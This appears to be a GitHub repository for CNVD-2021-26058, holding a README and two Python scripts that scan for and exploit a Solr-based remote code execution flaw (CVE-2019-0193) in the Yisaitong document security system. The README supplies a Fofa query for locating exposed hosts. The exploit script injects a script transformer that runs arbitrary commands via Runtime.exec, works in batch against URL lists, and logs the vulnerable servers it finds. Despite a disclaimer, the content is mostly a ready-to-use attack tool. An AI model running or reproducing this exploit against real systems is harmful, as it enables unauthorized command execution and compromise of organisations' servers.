├── 640.png
├── README.md
├── yisaitong-poc.py
└── yisaitong-exp.py


/640.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fengwenhua/CNVD-2021-26058/HEAD/640.png


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CNVD-2021-26058
 2 | 亿赛通电子文档安全管理系统-rce-exp
 3 | 
 4 | ## 漏洞成因
 5 | 使用了Apache Solr，漏洞编号：CVE-2019-0193
 6 | 
 7 | ## Fofa
 8 | ```
 9 | "电子文档安全管理系统" && country!="CN"
10 | ```
11 | 
12 | ## 脚本使用
13 | ```shell
14 | ~# python3 yisaitong-exp.py -h
15 | usage: yisaitong-exp.py [-h] [-u URL] [-c CMD] [-f FILE] [-k SKIP]
16 | 
17 | 亿赛通rce利用工具
18 | 
19 | optional arguments:
20 |   -h, --help            show this help message and exit
21 |   -u URL, --url URL     指定单个url
22 |   -c CMD, --cmd CMD     要执行的命令
23 |   -f FILE, --file FILE  指定要测试的urls文件
24 |   -k SKIP, --skip SKIP  跳过core_name
25 | ```
26 | 
27 | ![image](https://user-images.githubusercontent.com/26518808/119749983-de77da80-beca-11eb-8a45-159693feb8d3.png)
28 | 
29 | ![image](https://user-images.githubusercontent.com/26518808/119750248-8097c280-becb-11eb-90aa-9a1ee30ac059.png)
30 | 
31 | ![image](https://user-images.githubusercontent.com/26518808/119750581-37943e00-becc-11eb-859a-970281e14269.png)
32 | 
33 | 
34 | ```shell
35 | python3 yisaitong-poc.py -h
36 | usage: yisaitong-poc.py [-h] [-u URL] [-f FILE]
37 | 
38 | 亿赛通rce poc工具-不一定有漏洞
39 | 
40 | optional arguments:
41 |   -h, --help            show this help message and exit
42 |   -u URL, --url URL     指定单个url
43 |   -f FILE, --file FILE  指定要测试的urls文件
44 | ```
45 | 
46 | ![image](https://user-images.githubusercontent.com/26518808/119750314-9efdbe00-becb-11eb-9fce-3f1e2cde9742.png)
47 | 
48 | ## 免责声明
49 | 本工具仅面向合法授权的企业安全建设行为，如您需要测试本工具的可用性，请自行搭建靶机环境。
50 | 
51 | 在使用本工具进行检测时，您应确保该行为符合当地的法律法规，并且已经取得了足够的授权。请勿对非授权目标进行扫描。
52 | 
53 | 如您在使用本工具的过程中存在任何非法行为，您需自行承担相应后果，我们将不承担任何法律及连带责任。
54 | 
55 | 在安装并使用本工具前，请您务必审慎阅读、充分理解各条款内容，限制、免责条款或者其他涉及您重大权益的条款可能会以加粗、加下划线等形式提示您重点注意。 除非您已充分阅读、完全理解并接受本协议所有条款，否则，请您不要安装并使用本工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的，即视为您已阅读并同意本协议的约束。
56 | 


--------------------------------------------------------------------------------
/yisaitong-poc.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | # -*- coding: utf-8 -*-
  3 | # @Date    : 2021-02-21 16:34:54
  4 | # @Author  : 江南小虫虫 (fwh13612265462@gmail.com)
  5 | # @Link    : https://fengwenhua.top
  6 | 
  7 | import requests
  8 | requests.packages.urllib3.disable_warnings()
  9 | import urllib.parse
 10 | import re
 11 | import sys
 12 | import argparse
 13 | import random
 14 | 
 15 | 
 16 | def usera():
 17 |     """随机选择UA
 18 |     """
 19 |     user_agent_list = [
 20 |         'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) '
 21 |         'Chrome/45.0.2454.85 Safari/537.36 115Browser/6.0.3',
 22 |         'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
 23 |         'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
 24 |         'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)',
 25 |         'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',
 26 |         'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
 27 |         'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11',
 28 |         'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
 29 |         'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)',
 30 |         'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0',
 31 |         'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
 32 |     ]
 33 |     # 随机选择一个
 34 |     user_agent = random.choice(user_agent_list)
 35 |     return user_agent
 36 | 
 37 | 
 38 | def poc(target):
 39 |     """获取solr名字，默认是flow，同时也是poc
 40 |     :param target: 目标，http(s)://ip(domain):port，后面没有/
 41 |     :return
 42 |     """
 43 |     url = '{}/solr/admin/cores'.format(target)
 44 |     headers = {
 45 |         'User-Agent': usera()
 46 |     }
 47 |     try:
 48 |         r = requests.get(url, headers=headers, verify=False, timeout=10)
 49 |         #  and '<lst name="responseHeader">' in r.text
 50 |         # print("漏洞探测：")
 51 |         final_result = r.text
 52 |         if r.status_code == 200:
 53 |             result = re.search(
 54 |                 r'<str name="name">([\s\S]*?)</str><str name="instanceDir">', final_result, re.I)
 55 |             if result:
 56 |                 final_result = result.group(1)
 57 |                 # print('core_name: ', final_result)
 58 |                 return final_result
 59 |             else:
 60 |                 # print(r.text)
 61 |                 return False
 62 |         else:
 63 |             # print(r.text)
 64 |             return False
 65 | 
 66 |     except requests.exceptions.RequestException as e:
 67 |         print(e, file=logs_file)
 68 | 
 69 | 
 70 | def load_file(file_path):
 71 |     with open(file_path, 'r') as f:
 72 |         url_list = f.read().splitlines()
 73 |         # print(url_list)
 74 |         return url_list
 75 | 
 76 | 
 77 | def write_file(data_list):
 78 |     with open('yisaitong-vul-list.txt', 'w') as f:
 79 |         f.write('\n'.join(data_list))
 80 | 
 81 | 
 82 | if __name__ == '__main__':
 83 |     # # target后面没有 /
 84 |     #target = 'https://www.chinashb.com:8443'
 85 |     #cmd = 'ipconfig /all'
 86 |     if len(sys.argv) == 1:
 87 |         print("Usage: python3 yisaitong-poc.py -u url -f url.txt")
 88 |         sys.exit()
 89 |     parser = argparse.ArgumentParser(
 90 |         description='亿赛通rce poc工具-不一定有漏洞')
 91 |     parser.add_argument('-u', '--url', help='指定单个url')
 92 |     parser.add_argument('-f', '--file', help='指定要测试的urls文件')
 93 |     args = parser.parse_args()
 94 | 
 95 |     logs_file = open('yisaitong-log.txt', 'w')
 96 |     target = args.url
 97 |     if target:
 98 |         core_name = poc(target)
 99 |         if core_name:
100 |             print("VUL")
101 |         else:
102 |             print('NO VUL')
103 |     if args.file:
104 |         vul_url_list = []
105 |         for url in load_file(args.file):
106 |             print('处理：', url)
107 |             print('处理：' + url, file=logs_file)
108 |             core_name = poc(url)
109 |             if core_name:
110 |                 print('VUL: ' + url)
111 |                 print('VUL: ' + url, file=logs_file)
112 |                 vul_url_list.append(url)
113 |             else:
114 |                 print('NO VUL: ' + url)
115 |                 print('NO VUL: ' + url, file=logs_file)
116 |         if len(vul_url_list) > 0:
117 |             write_file(vul_url_list)
118 |             print("url列表已经写入文件当前目录下的 yisaitong-vul-list.txt 了")
119 |     logs_file.close()
120 | 


--------------------------------------------------------------------------------
/yisaitong-exp.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | # -*- coding: utf-8 -*-
  3 | # @Date    : 2021-02-21 16:34:54
  4 | # @Author  : 江南小虫虫 (fwh13612265462@gmail.com)
  5 | # @Link    : https://fengwenhua.top
  6 | 
  7 | import requests
  8 | requests.packages.urllib3.disable_warnings()
  9 | import urllib.parse
 10 | import re
 11 | import sys
 12 | import argparse
 13 | import random
 14 | 
 15 | 
 16 | def usera():
 17 |     """随机选择UA
 18 |     """
 19 |     user_agent_list = [
 20 |         'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) '
 21 |         'Chrome/45.0.2454.85 Safari/537.36 115Browser/6.0.3',
 22 |         'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
 23 |         'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',
 24 |         'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)',
 25 |         'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',
 26 |         'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
 27 |         'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11',
 28 |         'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
 29 |         'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)',
 30 |         'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0',
 31 |         'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
 32 |     ]
 33 |     # 随机选择一个
 34 |     user_agent = random.choice(user_agent_list)
 35 |     return user_agent
 36 | 
 37 | 
 38 | def exp(target, core_name, cmd, logs_file):
 39 |     """执行命令
 40 |     :param target: 目标，http(s)://ip(domain):port，后面没有/
 41 |     :param cmd: 要执行的命令
 42 |     :return
 43 |     """
 44 | 
 45 |     print('url: ' + target, file=logs_file)
 46 |     cmd = urllib.parse.quote(cmd)
 47 |     URL = '''{}/solr/{}/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22{}%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20'''.format(target, core_name, cmd)
 48 |     files = {'stream.body': '''<?xml version="1.0" encoding="UTF-8"?>
 49 |     <RDF>
 50 |     <item/>
 51 |     </RDF>'''}
 52 | 
 53 |     headers = {
 54 |         'User-Agent': usera()
 55 |     }
 56 |     try:
 57 |         r = requests.post(URL, files=files, headers=headers,
 58 |                           verify=False, timeout=8)
 59 |         final_result = r.text
 60 |         if r.status_code == 200:
 61 | 
 62 |             result = re.search(
 63 |                 r'documents"><lst><arr name="title"><str>([\s\S]*?)</str></arr></lst>', final_result, re.I)
 64 |             if result:
 65 |                 final_result = result.group(1)
 66 |             else:
 67 |                 print("没有洞，或者命令错误")
 68 |                 return False
 69 |             print("有漏洞！！！", file=logs_file)
 70 |             print("有漏洞！！！")
 71 |             print("命令执行结果：", file=logs_file)
 72 |             print("命令执行结果：")
 73 |             print(final_result, file=logs_file)
 74 |             print(final_result)
 75 |             return True
 76 |         else:
 77 |             print("没有洞，GG")
 78 |             return False
 79 |     except requests.exceptions.RequestException as e:
 80 |         print(e, file=logs_file)
 81 | 
 82 | 
 83 | def get_core_name(target):
 84 |     """获取solr名字，默认是flow
 85 |     :param target: 目标，http(s)://ip(domain):port，后面没有/
 86 |     :return
 87 |     """
 88 |     url = '{}/solr/admin/cores'.format(target)
 89 |     headers = {
 90 |         'User-Agent': usera()
 91 |     }
 92 |     r = requests.get(url, headers=headers, verify=False)
 93 |     #  and '<lst name="responseHeader">' in r.text
 94 |     # print("漏洞探测：")
 95 |     final_result = r.text
 96 |     if r.status_code == 200:
 97 |         result = re.search(
 98 |             r'<str name="name">([\s\S]*?)</str><str name="instanceDir">', final_result, re.I)
 99 |         if result:
100 |             final_result = result.group(1)
101 |             # print('core_name: ', final_result)
102 |             return final_result
103 |         else:
104 |             # print(r.text)
105 |             return False
106 |     else:
107 |         # print(r.text)
108 |         return False
109 | 
110 | 
111 | def load_file(file_path):
112 |     with open(file_path, 'r') as f:
113 |         url_list = f.read().splitlines()
114 |         # print(url_list)
115 |         return url_list
116 | 
117 | 
118 | def write_file(data_list):
119 |     with open('yisaitong-vul-list.txt', 'w') as f:
120 |         f.write('\n'.join(data_list))
121 | 
122 | 
123 | if __name__ == '__main__':
124 |     # # target后面没有 /
125 |     #target = 'https://www.chinashb.com:8443'
126 |     #cmd = 'ipconfig /all'
127 |     if len(sys.argv) == 1:
128 |         print("Usage: python3 yisaitong-rce.py -u url -c cmd -f url.txt")
129 |         sys.exit()
130 |     parser = argparse.ArgumentParser(
131 |         description='亿赛通rce利用工具')
132 |     parser.add_argument('-u', '--url', help='指定单个url')
133 |     parser.add_argument('-c', '--cmd', default='whoami', help='要执行的命令')
134 |     parser.add_argument('-f', '--file', help='指定要测试的urls文件')
135 |     parser.add_argument('-k', '--skip', help='跳过core_name', default=True)
136 |     args = parser.parse_args()
137 | 
138 |     logs_file = open('yisaitong-log.txt', 'w')
139 |     cmd = args.cmd
140 |     target = args.url
141 |     if target:
142 |         core_name = get_core_name(target)
143 |         if core_name:
144 |             exp(target, core_name, cmd, logs_file)
145 |         else:
146 |             print('NO VUL')
147 |     if args.file:
148 |         vul_url_list = []
149 |         for url in load_file(args.file):
150 |             print('处理：', url)
151 |             print('处理：' + url, file=logs_file)
152 |             if args.skip:
153 |                 core_name = 'flow'
154 |             else:
155 |                 core_name = get_core_name(url)
156 |             if core_name:
157 |                 res = exp(url, core_name, cmd, logs_file)
158 |                 if res:
159 |                     vul_url_list.append(url)
160 |             else:
161 |                 print('NO VUL' + url, file=logs_file)
162 |         if len(vul_url_list) > 0:
163 |             write_file(vul_url_list)
164 |             print("url列表已经写入文件当前目录下的 yisaitong-vul-list.txt 了")
165 |     logs_file.close()
166 | 


--------------------------------------------------------------------------------